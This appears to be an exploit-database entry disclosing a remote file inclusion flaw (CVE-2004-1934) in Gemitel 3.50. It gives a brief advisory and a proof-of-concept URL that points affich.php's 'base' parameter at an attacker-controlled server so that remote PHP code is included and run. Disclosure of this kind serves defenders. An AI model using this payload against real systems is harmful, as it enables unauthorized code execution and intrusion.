Gemitel 3.50 - '/affich.php' Remote File Inclusion / Command Injection



EKU-ID: 29429 CVE: CVE-2004-1934;OSVDB-5396 OSVDB-ID:
Author: jaguar Published: 2004-04-15 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


source: https://www.securityfocus.com/bid/10156/info

A vulnerability has been identified in the handling of input by Gemitel. Because of this, it may be possible for a remote user to gain unauthorized access to a system using the vulnerable software.

It is possible to influence the include path of certain files, which could lead to an attacker including arbitrary PHP files from an external system.

http://www.example.com/[Gemitel folder]/html/affich.php?base=http://[your server]/